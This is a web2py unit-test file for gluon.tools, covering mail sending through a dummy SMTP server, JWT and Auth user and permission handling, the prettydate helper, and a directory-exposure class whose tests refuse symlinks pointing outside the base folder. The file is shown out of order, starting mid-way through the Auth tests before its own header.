# corner case
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
permission_id = \
self.auth.add_permission(group_id=0,
name='user_1_permission',
table_name='auth_user',
record_id=0,
)
permission_name = \
self.db(self.db.auth_permission.id == permission_id).select(self.db.auth_permission.name).first().name
self.assertEqual(permission_name, 'user_1_permission')
# add an existing permission
permission_id =\
self.auth.add_permission(group_id=0,
name='user_1_permission',
table_name='auth_user',
record_id=0,
)
self.assertTrue(permission_id)
def test_del_permission(self):
permission_id = \
self.auth.add_permission(group_id=self.auth.id_group('user_1'),
name='del_permission_test',
table_name='auth_user',
record_id=0,
)
count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
self.assertTrue(self.auth.del_permission(group_id=self.auth.id_group('user_1'),
name='del_permission_test',
table_name='auth_user',
record_id=0,))
count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
# check that event is logged
self.assertEqual(count_log_event_test_after, count_log_event_test_before)
# really deleted
permission_count = \
self.db(self.db.auth_permission.id == permission_id).count()
self.assertFalse(permission_count)
# TODO: def test_accessible_query(self):
# TODO: def test_archive(self):
# TODO: def test_wiki(self):
# TODO: def test_wikimenu(self):
# End Auth test
# TODO: class TestCrud(unittest.TestCase):
# It deprecated so far from a priority
# TODO: class TestService(unittest.TestCase):
# TODO: class TestPluginManager(unittest.TestCase):
# TODO: class TestWiki(unittest.TestCase):
# TODO: class TestConfig(unittest.TestCase):
class TestToolsFunctions(unittest.TestCase):
"""
Test suite for all the tools.py functions
"""
def test_prettydate(self):
# plain
now = datetime.datetime.now()
self.assertEqual(prettydate(d=now), 'now')
one_second = now - datetime.timedelta(seconds=1)
self.assertEqual(prettydate(d=one_second), '1 second ago')
more_than_one_second = now - datetime.timedelta(seconds=2)
self.assertEqual(prettydate(d=more_than_one_second), '2 seconds ago')
one_minute = now - datetime.timedelta(seconds=60)
self.assertEqual(prettydate(d=one_minute), '1 minute ago')
more_than_one_minute = now - datetime.timedelta(seconds=61)
self.assertEqual(prettydate(d=more_than_one_minute), '1 minute ago')
two_minutes = now - datetime.timedelta(seconds=120)
self.assertEqual(prettydate(d=two_minutes), '2 minutes ago')
more_than_two_minutes = now - datetime.timedelta(seconds=121)
self.assertEqual(prettydate(d=more_than_two_minutes), '2 minutes ago')
one_hour = now - datetime.timedelta(seconds=60 * 60)
self.assertEqual(prettydate(d=one_hour), '1 hour ago')
more_than_one_hour = now - datetime.timedelta(seconds=3601)
self.assertEqual(prettydate(d=more_than_one_hour), '1 hour ago')
two_hours = now - datetime.timedelta(seconds=2 * 60 * 60)
self.assertEqual(prettydate(d=two_hours), '2 hours ago')
more_than_two_hours = now - datetime.timedelta(seconds=2 * 60 * 60 + 1)
self.assertEqual(prettydate(d=more_than_two_hours), '2 hours ago')
one_day = now - datetime.timedelta(days=1)
self.assertEqual(prettydate(d=one_day), '1 day ago')
more_than_one_day = now - datetime.timedelta(days=2)
self.assertEqual(prettydate(d=more_than_one_day), '2 days ago')
one_week = now - datetime.timedelta(days=7)
self.assertEqual(prettydate(d=one_week), '1 week ago')
more_than_one_week = now - datetime.timedelta(days=8)
self.assertEqual(prettydate(d=more_than_one_week), '1 week ago')
two_weeks = now - datetime.timedelta(days=14)
self.assertEqual(prettydate(d=two_weeks), '2 weeks ago')
more_than_two_weeks = now - datetime.timedelta(days=15)
self.assertEqual(prettydate(d=more_than_two_weeks), '2 weeks ago')
three_weeks = now - datetime.timedelta(days=21)
self.assertEqual(prettydate(d=three_weeks), '3 weeks ago')
one_month = now - datetime.timedelta(days=27)
self.assertEqual(prettydate(d=one_month), '1 month ago')
more_than_one_month = now - datetime.timedelta(days=28)
self.assertEqual(prettydate(d=more_than_one_month), '1 month ago')
two_months = now - datetime.timedelta(days=60)
self.assertEqual(prettydate(d=two_months), '2 months ago')
three_months = now - datetime.timedelta(days=90)
self.assertEqual(prettydate(d=three_months), '3 months ago')
one_year = now - datetime.timedelta(days=365)
self.assertEqual(prettydate(d=one_year), '1 year ago')
more_than_one_year = now - datetime.timedelta(days=366)
self.assertEqual(prettydate(d=more_than_one_year), '1 year ago')
two_years = now - datetime.timedelta(days=2 * 365)
self.assertEqual(prettydate(d=two_years), '2 years ago')
more_than_two_years = now - datetime.timedelta(days=2 * 365 + 1)
self.assertEqual(prettydate(d=more_than_two_years), '2 years ago')
# date()
d = now.date()
self.assertEqual(prettydate(d=d), 'now')
one_day = now.date() - datetime.timedelta(days=1)
self.assertEqual(prettydate(d=one_day), '1 day ago')
tow_days = now.date() - datetime.timedelta(days=2)
self.assertEqual(prettydate(d=tow_days), '2 days ago')
# from now
# from now is picky depending of the execution time, so we can't use sharp value like 1 second or 1 day
in_one_minute = now - datetime.timedelta(seconds=-65)
self.assertEqual(prettydate(d=in_one_minute), '1 minute from now')
in_twenty_three_hours = now - datetime.timedelta(hours=-23.5)
self.assertEqual(prettydate(d=in_twenty_three_hours), '23 hours from now')
in_one_year = now - datetime.timedelta(days=-366)
self.assertEqual(prettydate(d=in_one_year), '1 year from now')
# utc=True
now = datetime.datetime.utcnow()
self.assertEqual(prettydate(d=now, utc=True), 'now')
one_second = now - datetime.timedelta(seconds=1)
self.assertEqual(prettydate(d=one_second, utc=True), '1 second ago')
# not d or invalid date
self.assertEqual(prettydate(d=None), '')
self.assertEqual(prettydate(d='invalid_date'), '[invalid date]')
pjoin = os.path.join
def have_symlinks():
return os.name == 'posix'
class Test_Expose__in_base(unittest.TestCase):
def test_in_base(self):
are_under = [
# (sub, base)
('/foo/bar', '/foo'),
('/foo', '/foo'),
('/foo', '/'),
('/', '/'),
]
for sub, base in are_under:
self.assertTrue(Expose._Expose__in_base(subdir=sub, basedir=base, sep='/'),
'%s is not under %s' % (sub, base))
def test_not_in_base(self):
are_not_under = [
# (sub, base)
('/foobar', '/foo'),
('/foo', '/foo/bar'),
('/bar', '/foo'),
('/foo/bar', '/bar'),
('/', '/x'),
]
for sub, base in are_not_under:
self.assertFalse(Expose._Expose__in_base(subdir=sub, basedir=base, sep='/'),
'%s should not be under %s' % (sub, base))
class TestExpose(unittest.TestCase):
def setUp(self):
self.base_dir = tempfile.mkdtemp()
self.make_dirs()
self.touch_files()
self.make_readme()
if have_symlinks():
self.make_symlinks()
# $BASE/
# |-- inside/
# | |-- dir1/
# | | |-- file1
# | | `-- file2
# | |-- dir2/
# | | |-- link_to_dir1/@ -> $BASE/inside/dir1/
# | | `-- link_to_file1@ -> $BASE/inside/dir1/file1
# | |-- link_to_outside/@ -> $BASE/outside/
# | |-- link_to_file3@ -> $BASE/outside/file3
# | `-- README
# `-- outside/
# `-- file3
self.set_expectations()
tools.URL = lambda args: URL(a='a', c='c', f='f', args=args)
def tearDown(self):
tools.URL = URL
shutil.rmtree(self.base_dir)
def make_dirs(self):
"""setup directory structure"""
for d in (['inside'],
['inside', 'dir1'],
['inside', 'dir2'],
['outside']):
os.mkdir(pjoin(self.base_dir, *d))
def touch_files(self):
"""create some files"""
for f in (['inside', 'dir1', 'file1'],
['inside', 'dir1', 'file2'],
['outside', 'file3']):
with open(pjoin(self.base_dir, *f), 'a'):
pass
def make_readme(self):
with open(pjoin(self.base_dir, 'inside', 'README'), 'w') as f:
f.write('README content')
def make_symlinks(self):
"""setup extension for posix systems"""
# inside links
os.symlink(
pjoin(self.base_dir, 'inside', 'dir1'),
pjoin(self.base_dir, 'inside', 'dir2', 'link_to_dir1'))
os.symlink(
pjoin(self.base_dir, 'inside', 'dir1', 'file1'),
pjoin(self.base_dir, 'inside', 'dir2', 'link_to_file1'))
# outside links
os.symlink(
pjoin(self.base_dir, 'outside'),
pjoin(self.base_dir, 'inside', 'link_to_outside'))
os.symlink(
pjoin(self.base_dir, 'outside', 'file3'),
pjoin(self.base_dir, 'inside', 'link_to_file3'))
def set_expectations(self):
url = lambda args: URL('a', 'c', 'f', args=args)
self.expected_folders = {}
self.expected_folders['inside'] = SPAN(H3('Folders'), TABLE(
TR(TD(A('dir1', _href=url(args=['dir1'])))),
TR(TD(A('dir2', _href=url(args=['dir2'])))),
_class='table',
))
self.expected_folders[pjoin('inside', 'dir1')] = ''
if have_symlinks():
self.expected_folders[pjoin('inside', 'dir2')] = SPAN(H3('Folders'), TABLE(
TR(TD(A('link_to_dir1', _href=url(args=['dir2', 'link_to_dir1'])))),
_class='table',
))
else:
self.expected_folders[pjoin('inside', 'dir2')] = ''
self.expected_files = {}
self.expected_files['inside'] = SPAN(H3('Files'), TABLE(
TR(TD(A('README', _href=url(args=['README']))), TD('')),
_class='table',
))
self.expected_files[pjoin('inside', 'dir1')] = SPAN(H3('Files'), TABLE(
TR(TD(A('file1', _href=url(args=['dir1', 'file1']))), TD('')),
TR(TD(A('file2', _href=url(args=['dir1', 'file2']))), TD('')),
_class='table',
))
if have_symlinks():
self.expected_files[pjoin('inside', 'dir2')] = SPAN(H3('Files'), TABLE(
TR(TD(A('link_to_file1', _href=url(args=['dir2', 'link_to_file1']))), TD('')),
_class='table',
))
else:
self.expected_files[pjoin('inside', 'dir2')] = ''
def make_expose(self, base, show='', follow_symlink_out=False):
current.request = Request(env={})
current.request.raw_args = show
current.request.args = show.split('/')
return Expose(base=pjoin(self.base_dir, base),
basename=base,
follow_symlink_out=follow_symlink_out)
def test_expose_inside_state(self):
expose = self.make_expose(base='inside', show='')
self.assertEqual(expose.args, [])
self.assertEqual(expose.folders, ['dir1', 'dir2'])
self.assertEqual(expose.filenames, ['README'])
@unittest.skipUnless(have_symlinks(), 'requires symlinks')
def test_expose_inside_state_floow_symlink_out(self):
expose = self.make_expose(base='inside', show='',
follow_symlink_out=True)
self.assertEqual(expose.args, [])
self.assertEqual(expose.folders, ['dir1', 'dir2', 'link_to_outside'])
self.assertEqual(expose.filenames, ['README', 'link_to_file3'])
def test_expose_inside_dir1_state(self):
expose = self.make_expose(base='inside', show='dir1')
self.assertEqual(expose.args, ['dir1'])
self.assertEqual(expose.folders, [])
self.assertEqual(expose.filenames, ['file1', 'file2'])
def test_expose_inside_dir2_state(self):
expose = self.make_expose(base='inside', show='dir2')
self.assertEqual(expose.args, ['dir2'])
if have_symlinks():
self.assertEqual(expose.folders, ['link_to_dir1'])
self.assertEqual(expose.filenames, ['link_to_file1'])
else:
self.assertEqual(expose.folders, [])
self.assertEqual(expose.filenames, [])
def test_expose_base_inside_state(self):
expose = self.make_expose(base='', show='inside')
self.assertEqual(expose.args, ['inside'])
if have_symlinks():
self.assertEqual(expose.folders, ['dir1', 'dir2', 'link_to_outside'])
self.assertEqual(expose.filenames, ['README', 'link_to_file3'])
else:
self.assertEqual(expose.folders, ['dir1', 'dir2'])
self.assertEqual(expose.filenames, ['README'])
def test_expose_base_inside_dir2_state(self):
expose = self.make_expose(base='', show='inside/dir2')
self.assertEqual(expose.args, ['inside', 'dir2'])
if have_symlinks():
self.assertEqual(expose.folders, ['link_to_dir1'])
self.assertEqual(expose.filenames, ['link_to_file1'])
else:
self.assertEqual(expose.folders, [])
self.assertEqual(expose.filenames, [])
def assertSameXML(self, a, b):
self.assertEqual(a if isinstance(a, str) else a.xml(),
b if isinstance(b, str) else b.xml())
def run_test_xml_for(self, base, show):
expose = self.make_expose(base, show)
path = pjoin(base, show).rstrip(os.path.sep)
request = Request(env={})
self.assertSameXML(expose.table_files(), self.expected_files[path])
self.assertSameXML(expose.table_folders(), self.expected_folders[path])
def test_xml_inside(self):
self.run_test_xml_for(base='inside', show='')
def test_xml_dir1(self):
self.run_test_xml_for(base='inside', show='dir1')
def test_xml_dir2(self):
self.run_test_xml_for(base='inside', show='dir2')
def test_file_not_found(self):
with self.assertRaises(HTTP):
self.make_expose(base='inside', show='dir1/file_not_found')
def test_not_authorized(self):
with self.assertRaises(HTTP):
self.make_expose(base='inside', show='link_to_file3')
| #!/bin/python
# -*- coding: utf-8 -*-
"""
Unit tests for gluon.tools
"""
import os
import sys
import shutil
import tempfile
import smtplib
import datetime
import unittest
DEFAULT_URI = os.getenv('DB', 'sqlite:memory')
from gluon.dal import DAL, Field
from pydal.objects import Table
from gluon import tools
from gluon.tools import Auth, Mail, Recaptcha2, prettydate, Expose, prevent_open_redirect
from gluon._compat import PY2, to_bytes
from gluon.globals import Request, Response, Session
from gluon.storage import Storage
from gluon.languages import TranslatorFactory
from gluon.http import HTTP
from gluon import SPAN, H3, TABLE, TR, TD, A, URL, current
IS_IMAP = "imap" in DEFAULT_URI
class TestMail(unittest.TestCase):
"""
Test the Mail class.
"""
class Message(object):
def __init__(self, sender, to, payload):
self.sender = sender
self.to = to
self.payload = payload
self._parsed_payload = None
@property
def parsed_payload(self):
if self._parsed_payload is None:
import email
self._parsed_payload = email.message_from_string(self.payload)
return self._parsed_payload
class DummySMTP(object):
"""
Dummy smtp server
NOTE: Test methods should take care of always leaving inbox and users empty when they finish.
"""
inbox = []
users = {}
def __init__(self, address, port, **kwargs):
self.address = address
self.port = port
self.has_quit = False
self.tls = False
def login(self, username, password):
if username not in self.users or self.users[username] != password:
raise smtplib.SMTPAuthenticationError
self.username = username
self.password = password
def sendmail(self, sender, to, payload):
self.inbox.append(TestMail.Message(sender, to, payload))
def quit(self):
self.has_quit = True
def ehlo(self, hostname=None):
pass
def starttls(self):
self.tls = True
def setUp(self):
self.original_SMTP = smtplib.SMTP
self.original_SMTP_SSL = smtplib.SMTP_SSL
smtplib.SMTP = TestMail.DummySMTP
smtplib.SMTP_SSL = TestMail.DummySMTP
def tearDown(self):
smtplib.SMTP = self.original_SMTP
smtplib.SMTP_SSL = self.original_SMTP_SSL
def test_hello_world(self):
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
self.assertTrue(mail.send(to=['somebody@example.com'],
subject='hello',
# If reply_to is omitted, then mail.settings.sender is used
reply_to='us@example.com',
message='world'))
message = TestMail.DummySMTP.inbox.pop()
self.assertEqual(message.sender, mail.settings.sender)
self.assertEqual(message.to, ['somebody@example.com'])
header = "To: somebody@example.com\nReply-To: us@example.com\nSubject: hello\n"
self.assertTrue(header in message.payload)
self.assertTrue(message.payload.endswith('world'))
def test_failed_login(self):
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
mail.settings.login = 'username:password'
self.assertFalse(mail.send(to=['somebody@example.com'],
subject='hello',
# If reply_to is omitted, then mail.settings.sender is used
reply_to='us@example.com',
message='world'))
def test_login(self):
TestMail.DummySMTP.users['username'] = 'password'
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
mail.settings.login = 'username:password'
self.assertTrue(mail.send(to=['somebody@example.com'],
subject='hello',
# If reply_to is omitted, then mail.settings.sender is used
reply_to='us@example.com',
message='world'))
del TestMail.DummySMTP.users['username']
TestMail.DummySMTP.inbox.pop()
def test_html(self):
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
self.assertTrue(mail.send(to=['somebody@example.com'],
subject='hello',
# If reply_to is omitted, then mail.settings.sender is used
reply_to='us@example.com',
message='<html><head></head><body></body></html>'))
message = TestMail.DummySMTP.inbox.pop()
self.assertTrue('Content-Type: text/html' in message.payload)
def test_alternative(self):
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
self.assertTrue(mail.send(to=['somebody@example.com'],
message=('Text only', '<html><pre>HTML Only</pre></html>')))
message = TestMail.DummySMTP.inbox.pop()
self.assertTrue(message.parsed_payload.is_multipart())
self.assertTrue(message.parsed_payload.get_content_type() == 'multipart/alternative')
parts = message.parsed_payload.get_payload()
self.assertTrue('Text only' in parts[0].as_string())
self.assertTrue('<html><pre>HTML Only</pre></html>' in parts[1].as_string())
def test_ssl(self):
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
mail.settings.ssl = True
self.assertTrue(mail.send(to=['somebody@example.com'],
subject='hello',
# If reply_to is omitted, then mail.settings.sender is used
reply_to='us@example.com',
message='world'))
TestMail.DummySMTP.inbox.pop()
def test_tls(self):
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
mail.settings.tls = True
self.assertTrue(mail.send(to=['somebody@example.com'],
subject='hello',
# If reply_to is omitted, then mail.settings.sender is used
reply_to='us@example.com',
message='world'))
TestMail.DummySMTP.inbox.pop()
def test_attachment(self):
module_file = os.path.abspath(__file__)
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
self.assertTrue(mail.send(to=['somebody@example.com'],
subject='hello',
message='world',
attachments=Mail.Attachment(module_file)))
message = TestMail.DummySMTP.inbox.pop()
attachment = message.parsed_payload.get_payload(1).get_payload(decode=True)
with open(module_file, 'rb') as mf:
self.assertEqual(to_bytes(attachment), to_bytes(mf.read()))
# Test missing attachment name error
stream = open(module_file)
self.assertRaises(Exception, lambda *args, **kwargs: Mail.Attachment(*args, **kwargs), stream)
stream.close()
# Test you can define content-id and content type
self.assertTrue(mail.send(to=['somebody@example.com'],
subject='hello',
message='world',
attachments=Mail.Attachment(module_file, content_id='trololo', content_type='tra/lala')))
message = TestMail.DummySMTP.inbox.pop()
self.assertTrue('Content-Type: tra/lala' in message.payload)
self.assertTrue('Content-Id: <trololo>' in message.payload)
# TODO: class TestAuthJWT(unittest.TestCase):
class TestAuthJWT(unittest.TestCase):
def setUp(self):
from gluon.tools import AuthJWT
from gluon import current
self.request = Request(env={})
self.request.application = 'a'
self.request.controller = 'c'
self.request.function = 'f'
self.request.folder = 'applications/admin'
self.current = current
self.current.request = self.request
self.db = DAL(DEFAULT_URI, check_reserved=['all'])
self.auth = Auth(self.db)
self.auth.define_tables(username=True, signature=False)
self.user_data = dict(username='jwtuser', password='jwtuser123')
self.db.auth_user.insert(username=self.user_data['username'],
password=str(
self.db.auth_user.password.requires[0](
self.user_data['password'])[0]))
self.jwtauth = AuthJWT(self.auth, secret_key='secret', verify_expiration=True)
def test_jwt_token_manager(self):
import gluon.serializers
self.request.vars.update(self.user_data)
self.token = self.jwtauth.jwt_token_manager()
self.assertIsNotNone(self.token)
del self.request.vars['username']
del self.request.vars['password']
self.request.vars._token = gluon.serializers.json_parser.loads(self.token)['token']
self.token = self.jwtauth.jwt_token_manager()
self.assertIsNotNone(self.token)
def test_allows_jwt(self):
import gluon.serializers
self.request.vars.update(self.user_data)
self.token = self.jwtauth.jwt_token_manager()
self.assertIsNotNone(self.token)
del self.request.vars['username']
del self.request.vars['password']
self.token = self.jwtauth.jwt_token_manager()
self.request.vars._token = gluon.serializers.json_parser.loads(self.token)['token']
@self.jwtauth.allows_jwt()
def optional_auth():
self.assertEqual(self.user_data['username'], self.auth.user.username)
optional_auth()
@unittest.skipIf(IS_IMAP, "TODO: Imap raises 'Connection refused'")
# class TestAuth(unittest.TestCase):
#
# def setUp(self):
# request = Request(env={})
# request.application = 'a'
# request.controller = 'c'
# request.function = 'f'
# request.folder = 'applications/admin'
# response = Response()
# session = Session()
# T = TranslatorFactory('', 'en')
# session.connect(request, response)
# from gluon.globals import current
# current.request = request
# current.response = response
# current.session = session
# current.T = T
# self.db = DAL(DEFAULT_URI, check_reserved=['all'])
# self.auth = Auth(self.db)
# self.auth.define_tables(username=True, signature=False)
# self.db.define_table('t0', Field('tt'), self.auth.signature)
# self.auth.enable_record_versioning(self.db)
# # Create a user
# self.auth.get_or_create_user(dict(first_name='Bart',
# last_name='Simpson',
# username='bart',
# email='bart@simpson.com',
# password='bart_password',
# registration_key='bart',
# registration_id=''
# ))
# # self.auth.settings.registration_requires_verification = False
# # self.auth.settings.registration_requires_approval = False
#
# def test_assert_setup(self):
# self.assertEqual(self.db(self.db.auth_user.username == 'bart').select().first()['username'], 'bart')
# self.assertTrue('auth_user' in self.db)
# self.assertTrue('auth_group' in self.db)
# self.assertTrue('auth_membership' in self.db)
# self.assertTrue('auth_permission' in self.db)
# self.assertTrue('auth_event' in self.db)
#
# def test_enable_record_versioning(self):
# self.assertTrue('t0_archive' in self.db)
#
# def test_basic_blank_forms(self):
# for f in ['login', 'retrieve_password',
# 'retrieve_username',
# # 'register' # register complain about : client_side=self.settings.client_side
# ]:
# html_form = getattr(self.auth, f)().xml()
# self.assertTrue('name="_formkey"' in html_form)
#
# # NOTE: Not sure it is the proper way to logout_bare() as there is not methods for that and auth.logout() failed
# self.auth.logout_bare()
# # self.assertTrue(self.auth.is_logged_in())
#
# for f in ['logout', 'verify_email', 'reset_password',
# 'change_password', 'profile', 'groups']:
# self.assertRaisesRegexp(HTTP, "303*", getattr(self.auth, f))
#
# self.assertRaisesRegexp(HTTP, "401*", self.auth.impersonate)
#
# try:
# for t in ['t0_archive', 't0', 'auth_cas', 'auth_event',
# 'auth_membership', 'auth_permission', 'auth_group',
# 'auth_user']:
# self.db[t].drop()
# except SyntaxError as e:
# # GAE doesn't support drop
# pass
# return
#
# def test_get_or_create_user(self):
# self.db.auth_user.insert(email='user1@test.com', username='user1', password='password_123')
# self.db.commit()
# # True case
# self.assertEqual(self.auth.get_or_create_user({'email': 'user1@test.com',
# 'username': 'user1',
# 'password': 'password_123'
# })['username'], 'user1')
# # user2 doesn't exist yet and get created
# self.assertEqual(self.auth.get_or_create_user({'email': 'user2@test.com',
# 'username': 'user2'})['username'], 'user2')
# # user3 for corner case
# self.assertEqual(self.auth.get_or_create_user({'first_name': 'Omer',
# 'last_name': 'Simpson',
# 'email': 'user3@test.com',
# 'registration_id': 'user3',
# 'username': 'user3'})['username'], 'user3')
# # False case
# self.assertEqual(self.auth.get_or_create_user({'email': ''}), None)
# self.db.auth_user.truncate()
# self.db.commit()
#
# def test_login_bare(self):
# # The following test case should succeed but failed as I never received the user record but False
# self.auth.login_bare(username='bart@simpson.com', password='bart_password')
# self.assertTrue(self.auth.is_logged_in())
# # Failing login because bad_password
# self.assertEqual(self.auth.login_bare(username='bart', password='wrong_password'), False)
# self.db.auth_user.truncate()
#
# def test_register_bare(self):
# # corner case empty register call register_bare without args
# self.assertRaises(ValueError, self.auth.register_bare)
# # failing register_bare user already exist
# self.assertEqual(self.auth.register_bare(username='bart', password='wrong_password'), False)
# # successful register_bare
# self.assertEqual(self.auth.register_bare(username='user2',
# email='user2@test.com',
# password='password_123')['username'], 'user2')
# # raise ValueError
# self.assertRaises(ValueError, self.auth.register_bare,
# **dict(wrong_field_name='user3', password='password_123'))
# # raise ValueError wrong email
# self.assertRaises(ValueError, self.auth.register_bare,
# **dict(email='user4@', password='password_123'))
# self.db.auth_user.truncate()
# self.db.commit()
#
# def test_bulk_register(self):
# self.auth.login_bare(username='bart', password='bart_password')
# self.auth.settings.bulk_register_enabled = True
# bulk_register_form = self.auth.bulk_register(max_emails=10).xml()
# self.assertTrue('name="_formkey"' in bulk_register_form)
#
# def test_change_password(self):
# self.auth.login_bare(username='bart', password='bart_password')
# change_password_form = getattr(self.auth, 'change_password')().xml()
# self.assertTrue('name="_formkey"' in change_password_form)
#
# def test_profile(self):
# self.auth.login_bare(username='bart', password='bart_password')
# profile_form = getattr(self.auth, 'profile')().xml()
# self.assertTrue('name="_formkey"' in profile_form)
#
# # def test_impersonate(self):
# # # Create a user to be impersonated
# # self.auth.get_or_create_user(dict(first_name='Omer',
# # last_name='Simpson',
# # username='omer',
# # email='omer@test.com',
# # password='password_omer',
# # registration_key='',
# # registration_id=''))
# # # Create impersonate group, assign bart to impersonate group and add impersonate permission over auth_user
# # self.auth.add_group('impersonate')
# # self.auth.add_membership(user_id=1,
# # group_id=self.db(self.db.auth_user.username == 'bart'
# # ).select(self.db.auth_user.id).first().id)
# # self.auth.add_permission(group_id=self.db(self.db.auth_group.role == 'impersonate'
# # ).select(self.db.auth_group.id).first().id,
# # name='impersonate',
# # table_name='auth_user',
# # record_id=0)
# # # Bart login
# # self.auth.login_bare(username='bart', password='bart_password')
# # self.assertTrue(self.auth.is_logged_in())
# # # Bart impersonate Omer
# # omer_id = self.db(self.db.auth_user.username == 'omer').select(self.db.auth_user.id).first().id
# # impersonate_form = self.auth.impersonate(user_id=omer_id)
# # self.assertTrue(self.auth.is_impersonating())
# # self.assertEqual(impersonate_form, 'test')
#
# # def test_impersonate(self):
# # request = Request(env={})
# # request.application = 'a'
# # request.controller = 'c'
# # request.function = 'f'
# # request.folder = 'applications/admin'
# # response = Response()
# # session = Session()
# # T = TranslatorFactory('', 'en')
# # session.connect(request, response)
# # from gluon.globals import current
# # current.request = request
# # current.response = response
# # current.session = session
# # current.T = T
# # db = DAL(DEFAULT_URI, check_reserved=['all'])
# # auth = Auth(db)
# # auth.define_tables(username=True, signature=False)
# # db.define_table('t0', Field('tt'), auth.signature)
# # auth.enable_record_versioning(db)
# # # Create a user
# # auth.get_or_create_user(dict(first_name='Bart',
# # last_name='Simpson',
# # username='bart',
# # email='bart@simpson.com',
# # password='bart_password',
# # registration_key='bart',
# # registration_id=''
# # ))
# # # Create a user to be impersonated
# # auth.get_or_create_user(dict(first_name='Omer',
# # last_name='Simpson',
# # username='omer',
# # email='omer@test.com',
# # password='password_omer',
# # registration_key='',
# # registration_id=''))
# # # Create impersonate group, assign bart to impersonate group and add impersonate permission over auth_user
# # auth.add_group('impersonate')
# # auth.add_membership(user_id=1,
# # group_id=db(db.auth_user.username == 'bart'
# # ).select(db.auth_user.id).first().id)
# # auth.add_permission(group_id=db(db.auth_group.role == 'impersonate'
# # ).select(db.auth_group.id).first().id,
# # name='impersonate',
# # table_name='auth_user',
# # record_id=0)
# # # Bart login
# # auth.login_bare(username='bart', password='bart_password')
# # # Bart impersonate Omer
# # omer_id = db(db.auth_user.username == 'omer').select(db.auth_user.id).first().id
# # impersonate_form = auth.impersonate(user_id=omer_id)
# # self.assertTrue(auth.is_impersonating())
# # self.assertEqual(impersonate_form, 'test')
class TestAuth(unittest.TestCase):
def myassertRaisesRegex(self, *args, **kwargs):
if PY2:
return getattr(self, 'assertRaisesRegexp')(*args, **kwargs)
return getattr(self, 'assertRaisesRegex')(*args, **kwargs)
def setUp(self):
self.request = Request(env={})
self.request.application = 'a'
self.request.controller = 'c'
self.request.function = 'f'
self.request.folder = 'applications/admin'
self.response = Response()
self.session = Session()
T = TranslatorFactory('', 'en')
self.session.connect(self.request, self.response)
from gluon.globals import current
self.current = current
self.current.request = self.request
self.current.response = self.response
self.current.session = self.session
self.current.T = T
self.db = DAL(DEFAULT_URI, check_reserved=['all'])
self.auth = Auth(self.db)
self.auth.define_tables(username=True, signature=False)
self.db.define_table('t0', Field('tt'), self.auth.signature)
self.auth.enable_record_versioning(self.db)
self.auth.settings.registration_requires_verification = False
self.auth.settings.registration_requires_approval = False
# Create a user
# Note: get_or_create_user() doesn't seems to create user properly it better to use register_bare() and
# prevent login_bare() test from succeed. db insert the user manually not properly work either.
# Not working
# self.auth.get_or_create_user(dict(first_name='Bart',
# last_name='Simpson',
# username='bart',
# email='bart@simpson.com',
# password='bart_password',
# # registration_key=None,
# #registration_id='bart@simpson.com'
# ),
# login=False)
# Not working
# self.db.auth_user.insert(first_name='Bart',
# last_name='Simpson',
# username='bart',
# email='bart@simpson.com',
# password='bart_password')
# self.db.commit()
self.auth.register_bare(first_name='Bart',
last_name='Simpson',
username='bart',
email='bart@simpson.com',
password='bart_password')
def test_assert_setup(self):
self.assertTrue('auth_user' in self.db)
self.assertTrue('auth_group' in self.db)
self.assertTrue('auth_membership' in self.db)
self.assertTrue('auth_permission' in self.db)
self.assertTrue('auth_event' in self.db)
bart_record = self.db(self.db.auth_user.username == 'bart').select().first()
self.assertEqual(bart_record['username'], 'bart')
self.assertEqual(bart_record['registration_key'], '')
bart_id = self.db(self.db.auth_user.username == 'bart').select().first().id
bart_group_id = self.db(self.db.auth_group.role == 'user_{0}'.format(bart_id)).select().first().id
self.assertTrue(self.db((self.db.auth_membership.group_id == bart_group_id) &
(self.db.auth_membership.user_id == bart_id)).select().first())
# Just calling many form functions
def test_basic_blank_forms(self):
for f in ['login', 'retrieve_password', 'retrieve_username', 'register']:
html_form = getattr(self.auth, f)().xml()
self.assertTrue(b'name="_formkey"' in html_form)
for f in ['logout', 'verify_email', 'reset_password', 'change_password', 'profile', 'groups']:
self.myassertRaisesRegex(HTTP, "303*", getattr(self.auth, f))
self.myassertRaisesRegex(HTTP, "401*", self.auth.impersonate)
try:
for t in ['t0_archive', 't0', 'auth_cas', 'auth_event',
'auth_membership', 'auth_permission', 'auth_group',
'auth_user']:
self.db[t].drop()
except SyntaxError as e:
# GAE doesn't support drop
pass
return
def test_get_vars_next(self):
self.current.request.vars._next = 'next_test'
self.assertEqual(self.auth.get_vars_next(), 'next_test')
# TODO: def test_navbar(self):
# TODO: def test___get_migrate(self):
def test_enable_record_versioning(self):
self.assertTrue('t0_archive' in self.db)
# TODO: def test_define_signature(self):
# TODO: def test_define_signature(self):
# TODO: def test_define_table(self):
def test_log_event(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
bart_id = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
# user logged in
self.auth.log_event(description='some_log_event_description_%(var1)s',
vars={"var1": "var1"},
origin='log_event_test_1')
rtn = self.db(self.db.auth_event.origin == 'log_event_test_1'
).select(*[self.db.auth_event[f]
for f in self.db.auth_event.fields if f not in ('id', 'time_stamp')]).first().as_dict()
self.assertEqual(set(rtn.items()), set({'origin': 'log_event_test_1',
'client_ip': None,
'user_id': bart_id,
'description': 'some_log_event_description_var1'}.items()))
# user not logged
self.auth.logout_bare()
self.auth.log_event(description='some_log_event_description_%(var2)s',
vars={"var2": "var2"},
origin='log_event_test_2')
rtn = self.db(self.db.auth_event.origin == 'log_event_test_2'
).select(*[self.db.auth_event[f]
for f in self.db.auth_event.fields if f not in ('id', 'time_stamp')]).first().as_dict()
